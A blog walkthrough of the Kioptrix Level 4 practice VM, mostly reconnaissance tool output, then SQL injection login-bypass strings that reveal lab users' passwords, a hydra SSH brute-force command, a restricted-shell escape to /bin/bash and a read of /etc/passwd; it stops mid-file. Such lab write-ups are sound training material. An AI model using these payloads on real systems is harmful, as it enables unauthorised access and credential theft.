Tuesday, 16 August 2016

Kioptrix Level 4


This document is for educational purposes only, I take no responsibility for other peoples actions. This is a review of Kioptrix Level 4 (1.3) vulnarable VM: 
http://www.kioptrix.com/dlvm/Kioptrix4_vmware.rar

Currently scanning: Finished!   |   Screen View: Unique Hosts              
                                                                             
 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname    
 -----------------------------------------------------------------------------
 192.168.180.1   00:50:56:c0:00:08      1      60  VMware, Inc.              
 192.168.180.2   00:50:56:f9:f6:4a      1      60  VMware, Inc.              
 192.168.180.136 00:0c:29:08:fb:c7      1      60  VMware, Inc.              
 192.168.180.254 00:50:56:f4:3f:7c      1      60  VMware, Inc.  

nmap -sV -T4 -O -F --version-light 192.168.180.136

Starting Nmap 7.01 ( https://nmap.org ) at 2016-07-05 08:29 EDT
Nmap scan report for 192.168.180.136
Host is up (0.00020s latency).
Not shown: 65 closed ports, 31 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:08:FB:C7 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.62 seconds

nmap -sC -sS -T4 -A -v -v -Pn 192.168.180.136

Starting Nmap 7.01 ( https://nmap.org ) at 2016-07-05 08:31 EDT
NSE: Loaded 132 scripts for scanning.
<omited>
Host is up, received arp-response (0.00021s latency).
Scanned at 2016-07-05 08:31:51 EDT for 33s
Not shown: 566 closed ports, 430 filtered ports
Reason: 566 resets and 430 no-responses
PORT    STATE SERVICE     REASON         VERSION
22/tcp  open  ssh         syn-ack ttl 64 OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAJQxDWMK4xxdEEdMA0YQLblzXV5xx6slDUANQmyouzmobMxTcImV1OfY9vB2LUjJwSbtuPn/Ef7LCik29SLab6FD59QsJKz3tOfX1UZJ9FeoxPhoVsfk+LDM4FbQxo0pPYhlQadVHAicjUnONl5WaaUEYuelAoU36v2wOKKDe+kRAAAAFQDAmqYNY1Ou7o5qEfZx0e9+XNUJ2QAAAIAt6puNENxfFnl74pmuKgeQaZQCsPnZlSyTODcP961mwFvTMHWD4pQsg0j6GlPUZrXUCmeTcNqbUQQHei6l8U1zMO4xFYxVz2kkGhbQAa/FGd1r3TqKXu+jQxTmp7xvNBVHoT3rKPqcd12qtweTjlYKlcHgW5XL3mR1Nw91JrhMlAAAAIAWHQLIOjwyAFvUhjGqEVK1Y0QoCoNLGEFd+wcrMLjpZEz7/Ay9IhyuBuRbeR/TxjitcUX6CC58cF5KoyhyQytFH17ZMpegb9x29mQiAg4wK1MGOi9D8OU1cW/COd/E8LvrNLxMFllatLVscw/WXXTi8fFmOEzkGsaRKC6NiQhDlg==
|   2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApA/UX2iq4JYXncTEDfBoyJWguuDkWDvyw4HlLyc1UBT3Pn2wnYLYa0MjwkBtPilmf5X1zK1z3su7oBEcSEt6o7RzDEUbC1O6nRvY4oSKwBD0qLaIHM1V5CZ+YDtLneY6IriJjHJ0DgNyXalPbQ36VZgu20o9dH8ItDkjlZTxRHPE6RnPiD1aZSLo452LNU3N+/2M/ny7QMvIyPNkcojeZQWS7RRSDa2lEUw1X1ECL6zCMiWC0lhciZf5ieum9MnATTF3dgk4BnCq6dfdEvae0avSypMcs6no2CJ2j9PPoAQ1VWj/WlAZzEbfna9YQ2cx8sW/W/9GfKA5SuLFt1u0iQ==
80/tcp  open  http        syn-ack ttl 64 Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:08:FB:C7 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
TCP/IP fingerprint:
OS:SCAN(V=7.01%E=4%D=7/5%OT=22%CT=1%CU=33742%PV=Y%DS=1%DC=D%G=Y%M=000C29%TM
OS:=577BA8D8%P=i586-pc-linux-gnu)SEQ(SP=C8%GCD=1%ISR=CF%TI=Z%CI=Z%II=I%TS=7
OS:)OPS(O1=M5B4ST11NW6%O2=M5B4ST11NW6%O3=M5B4NNT11NW6%O4=M5B4ST11NW6%O5=M5B
OS:4ST11NW6%O6=M5B4ST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0
OS:)ECN(R=Y%DF=Y%T=40%W=16D0%O=M5B4NNSNW6%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+
OS:%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11NW6
OS:%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T
OS:7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN
OS:=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 0.004 days (since Tue Jul  5 08:27:17 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=200 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   KIOPTRIX4<00>        Flags: <unique><active>
|   KIOPTRIX4<03>        Flags: <unique><active>
|   KIOPTRIX4<20>        Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
| Statistics:
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 51861/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 63161/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 12408/udp): CLEAN (Failed to receive data)
|   Check 4 (port 10447/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name:
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2016-07-05T11:32:22-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol

TRACEROUTE
HOP RTT     ADDRESS
1   0.21 ms 192.168.180.136

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 08:32
Completed NSE at 08:32, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 08:32
Completed NSE at 08:32, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.71 seconds
           Raw packets sent: 1450 (64.546KB) | Rcvd: 586 (24.154KB)

nmap -sC -sU -T4 -A -v -v -Pn –top-ports 200 192.168.180.136

Starting Nmap 7.01 ( https://nmap.org ) at 2016-07-05 08:34 EDT
<omited some large info>
Scanned at 2016-07-05 08:34:11 EDT for 1193s
Not shown: 954 closed ports
Reason: 954 port-unreaches
PORT      STATE         SERVICE     REASON              VERSION
<omited>
137/udp   open          netbios-ns  udp-response ttl 64 Microsoft Windows XP netbios-ssn
<omited>
MAC Address: 00:0C:29:08:FB:C7 (VMware)
Too many fingerprints match this host to give specific OS details
TCP/IP fingerprint:
SCAN(V=7.01%E=4%D=7/5%OT=%CT=%CU=2%PV=Y%DS=1%DC=D%G=N%M=000C29%TM=577BADEC%P=i586-pc-linux-gnu)
SEQ(CI=Z%II=I)
T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop
Service Info: Host: KIOPTRIX4; OS: Windows XP; CPE: cpe:/o:microsoft:windows_xp

Host script results:
| nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   KIOPTRIX4<00>        Flags: <unique><active>
|   KIOPTRIX4<03>        Flags: <unique><active>
|   KIOPTRIX4<20>        Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
| Statistics:
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00

TRACEROUTE
HOP RTT     ADDRESS
1   0.22 ms 192.168.180.136

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 08:54
Completed NSE at 08:54, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 08:54
Completed NSE at 08:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1193.64 seconds
           Raw packets sent: 1710 (50.767KB) | Rcvd: 1046 (60.396KB)

dirb http://192.168.180.136

-----------------
DIRB v2.22  
By The Dark Raver
-----------------

START_TIME: Tue Jul  5 08:57:06 2016
URL_BASE: http://192.168.180.136/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                        

---- Scanning URL: http://192.168.180.136/ ----
+ http://192.168.180.136/cgi-bin/ (CODE:403|SIZE:330)                        
==> DIRECTORY: http://192.168.180.136/images/                                
+ http://192.168.180.136/index (CODE:200|SIZE:1255)                          
+ http://192.168.180.136/index.php (CODE:200|SIZE:1255)                      
==> DIRECTORY: http://192.168.180.136/john/                                  
+ http://192.168.180.136/logout (CODE:302|SIZE:0)                            
+ http://192.168.180.136/member (CODE:302|SIZE:220)                          
+ http://192.168.180.136/server-status (CODE:403|SIZE:335)                  
                                                                             
---- Entering directory: http://192.168.180.136/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                      
    (Use mode '-w' if you want to scan it anyway)
                                                                             
---- Entering directory: http://192.168.180.136/john/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                      
    (Use mode '-w' if you want to scan it anyway)
                                                                             
-----------------
END_TIME: Tue Jul  5 08:57:07 2016
DOWNLOADED: 4612 - FOUND: 6


wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://192.168.180.136/FUZZ
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************

Target: http://192.168.180.136/FUZZ
Total requests: 3036

==================================================================
ID Response   Lines      Word         Chars          Request    
==================================================================

00540:  C=403     10 L      33 W    330 Ch  "cgi-bin/"
..."
01341:  C=200     45 L      94 W   1255 Ch  "index"
..."
01349:  C=301      9 L      31 W    358 Ch  "images"
..."
01609:  C=302      0 L       0 W      0 Ch  "logout"
..."
01726:  C=302      1 L      22 W    220 Ch  "member"
..."
01745:  C=301      9 L      31 W    356 Ch  "john"
..."
02311:  C=301      9 L      31 W    358 Ch  "robert"
..."
03035:  C=404      9 L      35 W    324 Ch  "t-bone"..."^C

nbtscan 192.168.180.136
Doing NBT name scan for addresses from 192.168.180.136

IP address       NetBIOS Name     Server    User             MAC address      
------------------------------------------------------------------------------
192.168.180.136  KIOPTRIX4        <server>  KIOPTRIX4        00:00:00:00:00:00

root@kali:/# enum4linux -a 192.168.180.136
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Jul  5 09:06:47 2016

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.180.136
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ======================================================= 
|    Enumerating Workgroup/Domain on 192.168.180.136    |
 ======================================================= 
[+] Got domain/workgroup name: WORKGROUP

 =============================================== 
|    Nbtstat Information for 192.168.180.136    |
 =============================================== 
Looking up status of 192.168.180.136
KIOPTRIX4       <00> -         B <ACTIVE>  Workstation Service
KIOPTRIX4       <03> -         B <ACTIVE>  Messenger Service
KIOPTRIX4       <20> -         B <ACTIVE>  File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name

MAC Address = 00-00-00-00-00-00

 ======================================== 
|    Session Check on 192.168.180.136    |
 ======================================== 
[+] Server 192.168.180.136 allows sessions using username '', password ''

 ============================================== 
|    Getting domain SID for 192.168.180.136    |
 ============================================== 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ========================================= 
|    OS information on 192.168.180.136    |
 ========================================= 
[+] Got OS info for 192.168.180.136 from smbclient: Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
[+] Got OS info for 192.168.180.136 from srvinfo:
KIOPTRIX4      Wk Sv PrQ Unx NT SNT Kioptrix4 server (Samba, Ubuntu)
platform_id     : 500
os version      : 4.9
server type     : 0x809a03

 ================================ 
|    Users on 192.168.180.136    |
 ================================ 
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody Name: nobody Desc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert Name: ,,, Desc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root Name: root Desc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john Name: ,,, Desc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret Name: loneferret,,, Desc: (null)

user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]

 ============================================ 
|    Share Enumeration on 192.168.180.136    |
 ============================================ 
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]

Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
IPC$            IPC       IPC Service (Kioptrix4 server (Samba, Ubuntu))

Server               Comment
---------            -------
KIOPTRIX4            Kioptrix4 server (Samba, Ubuntu)

Workgroup            Master
---------            -------
---- ----------------
WORKGROUP            KIOPTRIX4

[+] Attempting to map shares on 192.168.180.136
//192.168.180.136/print$ Mapping: DENIED, Listing: N/A
//192.168.180.136/IPC$ [E] Can't understand response:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
NT_STATUS_NETWORK_ACCESS_DENIED listing \*

 ======================================================= 
|    Password Policy Information for 192.168.180.136    |
 ======================================================= 

[+] Attaching to 192.168.180.136 using a NULL share

[+] Trying protocol 445/SMB...

[+] Found domain(s):

[+] KIOPTRIX4
[+] Builtin

[+] Password Info for Domain: KIOPTRIX4

[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000

[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0

[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 0


 ================================= 
|    Groups on 192.168.180.136    |
 ================================= 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ========================================================================== 
|    Users on 192.168.180.136 via RID cycling (RIDS: 500-550,1000-1050)    |
 ========================================================================== 
[I] Found new SID: S-1-5-21-2529228035-991147148-3991031631
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\loneferret (Local User)
S-1-22-1-1001 Unix User\john (Local User)
S-1-22-1-1002 Unix User\robert (Local User)
[+] Enumerating users using SID S-1-5-21-2529228035-991147148-3991031631 and logon username '', password ''
S-1-5-21-2529228035-991147148-3991031631-500 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-501 KIOPTRIX4\nobody (Local User)
<omited>
S-1-5-21-2529228035-991147148-3991031631-513 KIOPTRIX4\None (Domain Group)
<omited>
S-1-5-21-2529228035-991147148-3991031631-1000 KIOPTRIX4\root (Local User)
<omited>
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
<omited>
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
<omited>

 ================================================ 
|    Getting printer info for 192.168.180.136    |
 ================================================ 
No printers returned.


enum4linux complete on Tue Jul  5 09:06:53 2016

root@kali:/# smbclient -N -L 192.168.180.136
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]

Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
IPC$            IPC       IPC Service (Kioptrix4 server (Samba, Ubuntu))
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]

Server               Comment
---------            -------
KIOPTRIX4            Kioptrix4 server (Samba, Ubuntu)

Workgroup            Master
---------            -------
-----------------------------------------
WORKGROUP            KIOPTRIX4

This just wasted my time:
hydra -l loneferret -P darkc0de.lst 192.168.180.136 ssh

So I left it and continued:
http://192.168.180.136/john/

Let's try the following for password:
' OR '1'='1
space at the end of the next query:
' OR '1'='1' -- 
' OR '1'='1' ({
' OR '1'='1' /*

What we get is:
Member's Control Panel
Username : john
Password : MyNameIsJohn

Username  robert
Password  ADGAdsafdfwt4gadfga==
' OR 1=1 #


SSH password is the same so let's try:
ssh john@192.168.180.136
The authenticity of host '192.168.180.136 (192.168.180.136)' can't be established.
RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.180.136' (RSA) to the list of known hosts.
john@192.168.180.136's password: 
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands

john:~$ 

john:~$ sudo su
*** forbidden sudo -> sudo su

cd /
*** forbidden path -> "/"
*** You have 0 warning(s) left, before getting kicked out.
This incident has been reported.

*** forbidden path -> "/"
*** Kicked out
Connection to 192.168.180.136 closed.

Haha, well. Let us try once more.

Type '?' or 'help' to get the list of allowed commands
john:~$ help
cd  clear  echo  exit  help  ll  lpath  ls

echo os.system('/bin/bash')

john@Kioptrix4:/home/loneferret$ ls -la
total 44
drwxr-xr-x 2 loneferret loneferret 4096 2012-02-06 16:38 .
drwxr-xr-x 5 root       root       4096 2012-02-04 18:05 ..
-rw------- 1 loneferret loneferret   62 2012-02-06 20:24 .bash_history
-rw-r--r-- 1 loneferret loneferret  220 2012-02-04 09:58 .bash_logout
-rw-r--r-- 1 loneferret loneferret 2940 2012-02-04 09:58 .bashrc
-rw-r--r-- 1 loneferret loneferret    1 2012-02-05 10:37 .lhistory
-rw------- 1 root       root         68 2012-02-04 10:05 .my.cnf.5086
-rw------- 1 root       root          1 2012-02-04 10:05 .mysql.5086
-rw------- 1 loneferret loneferret    1 2012-02-05 10:38 .mysql_history
-rw------- 1 loneferret loneferret    9 2012-02-06 16:39 .nano_history
-rw-r--r-- 1 loneferret loneferret  586 2012-02-04 09:58 .profile
-rw-r--r-- 1 loneferret loneferret    0 2012-02-04 10:01 .sudo_as_admin_successful

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash
john:x:1001:1001:,,,:/home/john:/bin/kshell
robert:x:1002:1002:,,,:/home/robert:/bin/kshell

john@Kioptrix4:/var/www$ uname -a
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux

cat debian_version
lenny/sid

john@Kioptrix4:/etc/ssh$ ps -aux
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1   2844  1692 ?        Ss   11:22   0:01 /sbin/init
root         2  0.0  0.0      0     0 ?        S<   11:22   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S<   11:22   0:00 [migration/0]
root         4  0.0  0.0      0     0 ?        S<   11:22   0:00 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   11:22   0:00 [watchdog/0]
root         6  0.0  0.0      0     0 ?        S<   11:22   0:00 [events/0]
root         7  0.0  0.0      0     0 ?        S<   11:22   0:00 [khelper]
root        41  0.0  0.0      0     0 ?        S<   11:22   0:00 [kblockd/0]
root        44  0.0  0.0      0     0 ?        S<   11:22   0:00 [kacpid]
root        45  0.0  0.0      0     0 ?        S<   11:22   0:00 [kacpi_notify]
root       170  0.0  0.0      0     0 ?        S<   11:22   0:00 [kseriod]
root       209  0.0  0.0      0     0 ?        S    11:22   0:00 [pdflush]
root       210  0.0  0.0      0     0 ?        S    11:22   0:00 [pdflush]
root       211  0.0  0.0      0     0 ?        S<   11:22   0:00 [kswapd0]
root       253  0.0  0.0      0     0 ?        S<   11:22   0:00 [aio/0]
root      1465  0.0  0.0      0     0 ?        S<   11:22   0:00 [ata/0]
root      1468  0.0  0.0      0     0 ?        S<   11:22   0:00 [ata_aux]
root      1475  0.0  0.0      0     0 ?        S<   11:22   0:00 [scsi_eh_0]
root      1481  0.0  0.0      0     0 ?        S<   11:22   0:00 [scsi_eh_1]
root      1494  0.0  0.0      0     0 ?        S<   11:22   0:00 [ksuspend_usbd]
root      1499  0.0  0.0      0     0 ?        S<   11:22   0:00 [khubd]
root      2362  0.0  0.0      0     0 ?        S<   11:22   0:00 [scsi_eh_2]
root      2604  0.0  0.0      0     0 ?        S<   11:22   0:00 [kjournald]
root      2772  0.0  0.0   2104   704 ?        S<s  11:22   0:00 /sbin/udevd --d
root      3078  0.0  0.0      0     0 ?        S<   11:22   0:00 [kgameportd]
root      3216  0.0  0.0      0     0 ?        S<   11:22   0:00 [kpsmoused]
root      4540  0.0  0.0   1716   492 tty4     Ss+  11:22   0:00 /sbin/getty 384
root      4541  0.0  0.0   1716   492 tty5     Ss+  11:22   0:00 /sbin/getty 384
root      4545  0.0  0.0   1716   492 tty2     Ss+  11:22   0:00 /sbin/getty 384
root      4546  0.0  0.0   1716   492 tty3     Ss+  11:22   0:00 /sbin/getty 384
root      4552  0.0  0.0   1716   492 tty6     Ss+  11:22   0:00 /sbin/getty 384
syslog    4589  0.0  0.0   1936   648 ?        Ss   11:22   0:00 /sbin/syslogd -
root      4608  0.0  0.0   1872   540 ?        S    11:22   0:00 /bin/dd bs 1 if
klog      4610  0.0  0.1   3160  2048 ?        Ss   11:22   0:00 /sbin/klogd -P
root      4629  0.0  0.0   5316   988 ?        Ss   11:22   0:01 /usr/sbin/sshd
root      4685  0.0  0.0   1772   524 ?        S    11:22   0:00 /bin/sh /usr/bi
root      4727  0.0  1.5 126988 16276 ?        Sl   11:22   0:00 /usr/sbin/mysql
root      4729  0.0  0.0   1700   556 ?        S    11:22   0:00 logger -p daemo
root      4802  0.0  0.1   6532  1356 ?        Ss   11:22   0:00 /usr/sbin/nmbd
root      4804  0.0  0.2  10108  2540 ?        Ss   11:22   0:00 /usr/sbin/smbd
root      4818  0.0  0.0  10108  1024 ?        S    11:22   0:00 /usr/sbin/smbd
root      4819  0.0  0.1   8084  1340 ?        Ss   11:22   0:00 /usr/sbin/winbi
root      4839  0.0  0.1   8208  1704 ?        S    11:22   0:00 /usr/sbin/winbi
daemon    4840  0.0  0.0   1984   420 ?        Ss   11:22   0:00 /usr/sbin/atd
root      4851  0.0  0.0   2104   884 ?        Ss   11:22   0:00 /usr/sbin/cron
root      4873  0.0  0.5  20464  6196 ?        Ss   11:22   0:00 /usr/sbin/apach
dhcp      4922  0.0  0.0   2440   764 ?        Ss   11:22   0:00 dhclient eth1
root      4929  0.0  0.0   1716   492 tty1     Ss+  11:22   0:00 /sbin/getty 384
root      4944  0.0  0.0   8084   872 ?        S    11:32   0:00 /usr/sbin/winbi
root      4945  0.0  0.1   8092  1264 ?        S    11:32   0:00 /usr/sbin/winbi
www-data  5608  0.0  0.3  20464  3276 ?        S    13:32   0:00 /usr/sbin/apach
root      5626  0.0  0.3  11360  3724 ?        Ss   13:38   0:00 sshd: john [pri
john      5628  0.0  0.1  11516  1860 ?        S    13:38   0:00 sshd: john@pts/
john      5629  0.0  0.3   5892  3816 pts/0    Ss   13:38   0:00 python /bin/ksh
www-data  5640  0.0  0.3  20464  3276 ?        S    13:41   0:00 /usr/sbin/apach
www-data  5641  0.0  0.3  20464  3276 ?        S    13:42   0:00 /usr/sbin/apach
www-data  5642  0.0  0.3  20464  3276 ?        S    13:42   0:00 /usr/sbin/apach
www-data  5643  0.0  0.3  20464  3276 ?        S    13:43   0:00 /usr/sbin/apach
john      5653  0.0  0.0   1772   480 pts/0    S    13:44   0:00 sh -c /bin/bash
john      5654  0.0  0.2   5432  2852 pts/0    R    13:44   0:00 /bin/bash
john      5749  0.0  0.0   2644  1012 pts/0    R+   14:00   0:00 ps -aux

MySQL is running as root.

john@Kioptrix4:/var/www$ cat checklogin.php   
<?php
ob_start();
$host="localhost"; // Host name
